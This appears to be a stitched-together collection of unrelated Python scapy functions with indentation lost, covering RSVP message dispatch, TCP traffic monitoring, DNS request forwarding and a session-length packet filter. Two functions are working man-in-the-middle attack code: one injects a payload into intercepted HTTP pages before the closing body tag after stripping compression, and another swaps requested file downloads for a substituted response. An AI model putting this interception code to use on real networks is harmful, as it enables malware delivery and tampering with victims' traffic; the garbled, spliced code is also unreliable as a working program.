def process_packet(pkt):
scapy_pkt = IP(pkt.get_payload())
if (scapy_pkt.haslayer(TCP) and scapy_pkt.haslayer(Raw)):
tcp = scapy_pkt.getlayer(TCP)
raw_load = scapy_pkt.getlayer(Raw).load
# If destination port is port 80, most likely a HTTP request, else HTTP response
if (tcp.dport == 80 and raw_load):
#print("[+] Request")
# Strip reqeuest of any encoding (such as compression)
raw_load = re.sub(b"Accept-Encoding:.*?\\r\\n", b'', raw_load)
# Change the request from HTTP/1.1 to HTTP/1.0 so content gets sent all at once
raw_load = raw_load.replace(b"HTTP/1.1", b"HTTP/1.0")
elif (tcp.sport == 80 and raw_load):
content_length = re.search(b"(?:Content-Length:\s)(\d*)", raw_load)
raw_load = raw_load.replace(b"</body>", INJECTION + b"</body>")
# Recalculate the content length of the HTML page
if (content_length and b"text/html" in raw_load):
#print("[+] Attempting to inject code into response payload")
content_length = content_length.group(1)
new_content_length = str(int(content_length) +
len(INJECTION)).encode()
raw_load = raw_load.replace(content_length, new_content_length)
if (raw_load != scapy_pkt.getlayer(Raw).load):
scapy_pkt = set_load(scapy_pkt, raw_load)
scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt)))
pkt.set_payload(scapy_pkt)
pkt.accept()
def process_packet(pkt):
data = IP(pkt)
rsvp_class = data.getlayer('RSVP').getfieldval('Class')
if rsvp_class == 0x01:
callback = process_path(data)
process_callback(
callback, lambda: process_path_last_hop(callback.request, callback.
data, callback.key))
if rsvp_class == 0x02:
callback = process_resv(data)
process_callback(
callback, lambda: process_resv_last_hop(callback.request, callback.
data, callback.key))
if rsvp_class == 0x05:
callback = process_path_tear(data)
process_callback(
callback, lambda: process_pathtear_last_hop(
callback.request, callback.data, callback.key))
if rsvp_class == 0x06:
callback = process_resv_tear(data)
process_callback(
callback, lambda: process_resvtear_last_hop(
callback.request, callback.data, callback.key))
if rsvp_class == 0x03:
callback = process_path_err(data)
process_callback(
callback, lambda: process_patherr_last_hop(
callback.request, callback.data, callback.key))
if rsvp_class == 0x04:
callback = process_resv_err(data)
process_callback(
callback, lambda: process_resverr_last_hop(
callback.request, callback.data, callback.key))
def monitor_data_parse(self, obj):
# get mac
srcMAC = []
dstMAC = [] # 目的MAC
for i in range(6):
srcMAC.append(obj.sourceMAC[i])
dstMAC.append(obj.destMAC[i])
tmp = []
for i in range(0, obj.dataLen - 1):
tmp.append(hex(obj.frameData.rawData[i])[2:])
payload = self.normalize_packet(tmp)
ethType = payload[:2]
payload = payload[2:]
payload = b''.join([bytes().fromhex(i) for i in payload])
res = IP(payload)
if res.getlayer(TCP) is None:
# 没有解析到TCP的数据
return
srcIp = res["IP"].src
dstIp = res["IP"].dst
proto = res["IP"].proto
sport = res["TCP"].sport
dport = res["TCP"].dport
seq = res["TCP"].seq
ack = res["TCP"].ack
flags = int(res["TCP"].flags)
window = res["TCP"].window
try:
raw = res["TCP"].load
except:
raw = b''
payload_len = len(raw)
MessageRecorder.add(srcIp,
dstIp,
sport,
dport,
srcMAC=srcMAC,
dstMAC=dstMAC,
srcIp=srcIp,
dstIp=dstIp,
srcPort=sport,
dstPort=dport,
ethType=ethType,
proto=proto,
seq=seq,
ack=ack,
flags=flags,
window=window,
raw=raw,
payload_len=payload_len,
timestamp=time.time())
def process_packet(pkt):
global ACK_LIST
scapy_pkt = IP(pkt.get_payload())
if (scapy_pkt.haslayer(TCP)):
tcp = scapy_pkt.getlayer(TCP)
raw_layer = scapy_pkt.getlayer(Raw).load if scapy_pkt.haslayer(
Raw) else None
# If destination port is port 80, most likely a HTTP request, else HTTP response
if (tcp.dport == 80 and raw_layer):
if (FILE_EXT in raw_layer and LOAD_KEYWORD not in raw_layer):
ACK_LIST.append(tcp.ack)
elif (tcp.sport == 80 and (tcp.seq in ACK_LIST) and raw_layer):
ACK_LIST.remove(tcp.seq)
scapy_pkt = set_load(scapy_pkt, CUSTOM_LOAD)
# Use the class instance to recalculate the chksum and len fields for us
# Accepts a packet in bytes format, then casted back into bytes for payload
scapy_pkt = raw(scapy_pkt.__class__(raw(scapy_pkt)))
# Update the current packets payload with the payload of our spoofed one
pkt.set_payload(scapy_pkt)
pkt.accept()
def __send_request(self, package):
org_layer_DNS = package.getlayer(DNS)
package_request = \
IP(dst=IP_DNS) / \
UDP(dport=53) / \
DNS(id=org_layer_DNS.id, qd=org_layer_DNS.qd)
send(package_request, count=1)
self.__log('info',
f'{IP_HOST} -> {IP_DNS}',
prefixes=['request'],
suffixes=[
package.getlayer(DNSQR).qname.decode(),
package.getlayer(DNSQR).qtype
])
return package_request.getlayer(DNS).id
def common_worker(payload: Packet, packets: list, tcp_sessions,
cb_listener, callbacks: list, pkt_counter: Counter,
ses_counter: Counter, bad_sessions: list):
data = payload.get_payload()
pkt = IP(data)
direction = Constants.DIRECTION_INPUT if pkt.fields[
'dst'] == '192.168.2.15' else Constants.DIRECTION_OUTPUT
tcp_pkt = None
allow = True
t = 1.5
ave = 0
sum = 0
port = 0
proto = 'other'
session_number = None
if pkt.proto == 0x06: # TCP
tcp_pkt = pkt.getlayer(1)
port = tcp_pkt.fields['dport']
proto = 'TCP'
good_sessions = 0
for s in tcp_sessions:
if s.valid:
sum += s.length
good_sessions += 1
ave = sum / good_sessions if good_sessions > 0 else sum
Logger.debug("AVE: " + str(ave))
Logger.debug("COUNT: " + str(good_sessions))
Logger.debug("sum" + str(sum))
session_number = TCPParser.parseTCPConnection(
direction, data, pkt, tcp_pkt, tcp_sessions, ses_counter)
# Logger.info("curr: "+str(tcp_sessions[session_number].length))
if ave != 0 and abs(tcp_sessions[session_number].length / ave) > t:
Logger.debug("!!! " +
str(abs(tcp_sessions[session_number].length /
ave)))
allow = False
# allow = CommonProcess.static_filter(data, ip_pkt=pkt, tcp_pkt=tcp_pkt, direction=direction)
else:
allow = CommonProcess.static_filter(data,
ip_pkt=pkt,
direction=direction)
if allow:
Logger.debug("Accepted")
pkt_counter.labels(protocol=pkt.proto,
action='accept',
port=port,
direction=direction).inc()
payload.accept()
else:
Logger.debug("Dropped!!!")
pkt_counter.labels(protocol=pkt.proto,
action='drop',
port=port,
direction=direction).inc()
payload.drop()
if session_number is not None:
tcp_sessions[session_number].valid = False
return payload
